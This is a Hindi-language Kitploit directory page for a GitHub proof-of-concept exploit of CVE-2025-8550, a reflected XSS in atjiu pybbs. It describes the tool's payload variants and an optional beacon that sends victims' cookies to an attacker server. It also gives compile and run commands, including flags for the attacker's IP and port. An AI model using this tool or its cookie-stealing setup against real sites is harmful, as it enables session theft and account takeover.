Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8550 — CVE-2025-8550 के लिए स्वचालित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, atjiu pybbs में एक प्रतिबिंबित XSS। 20+ पेलोड विविधताएं, कुकी बहिर्वेशन, मल्टीथ्रेडिंग, और पैठ परीक्षण के लिए अनुकूलन योग्य CLI शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/bytereaper77/cve-2025-8550
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगArchived
GitHubbytereaper77/cve-2025-8550

CVE-2025-8550

CVE-2025-8550 के लिए स्वचालित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, atjiu pybbs में एक प्रतिबिंबित XSS। 20+ पेलोड विविधताएं, कुकी बहिर्वेशन, मल्टीथ्रेडिंग, और पैठ परीक्षण के लिए अनुकूलन योग्य CLI शामिल हैं।

रिपॉजिटरी देखें
3121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-8550 – atjiu pybbs XSS एक्सप्लॉइट

विवरण

यह रिपॉजिटरी CVE-2025-8550 के लिए एक स्वचालित प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट होस्ट करती है, जो atjiu pybbs (≤ v6.0.0) में एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता है। यह /admin/topic/list एंडपॉइंट के username पैरामीटर को लक्षित करता है, जिसमें उचित इनपुट सैनिटाइजेशन का अभाव है।

विशेषताएँ

  • 20+ पेलोड विविधताएँ: script, SVG, iframe, object, onerror हैंडलर और अधिक।

  • स्वचालित URL एन्कोडिंग: libcurl के curl_easy_escape के माध्यम से सुरक्षित इंजेक्शन सुनिश्चित करता है।

  • कुकी एक्सफिल्ट्रेशन (वैकल्पिक): document.cookie को हमलावर-नियंत्रित सर्वर पर भेजने के लिए बीकन इंजेक्शन।

  • मल्टीथ्रेडिंग: प्रयासों को समानांतर करने और परीक्षण को गति देने के लिए pthreads का उपयोग करता है।

  • अनुकूलन योग्य CLI: argparse द्वारा संचालित, निम्नलिखित को निर्दिष्ट करने का समर्थन करता है:

    • लक्ष्य URL (-u / --url)
    • प्रमाणित अनुरोधों के लिए कुकी फ़ाइल (-c / --cookies)
    • कुकी पेलोड सक्षम करें (-k / --cokpay)
    • हमलावर सर्वर IP/पोर्ट (-i / --ip, -p / --port)
    • वर्बोज़ लॉगिंग (-v / --verbose)

निर्माण और उपयोग

# एक्सप्लॉइट बाइनरी संकलित करें
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread 

# लक्ष्य के विरुद्ध चलाएँ
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]

#कुकी भेजें :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
  • http://<TARGET> को atjiu pybbs के अपने इंस्टेंस से बदलें।
  • कुकी-चुराने वाले बीकन को सक्षम करने के लिए -k का उपयोग करें (-i और -p की आवश्यकता है)।
  • यदि प्रमाणीकरण कुकी की आवश्यकता नहीं है तो -c को छोड़ दें।

संदर्भ :

  • NVD प्रविष्टि : https://nvd.nist.gov/vuln/detail/CVE-2025-8550

लाइसेंस :

MIT लाइसेंस

टूल डाउनलोड करें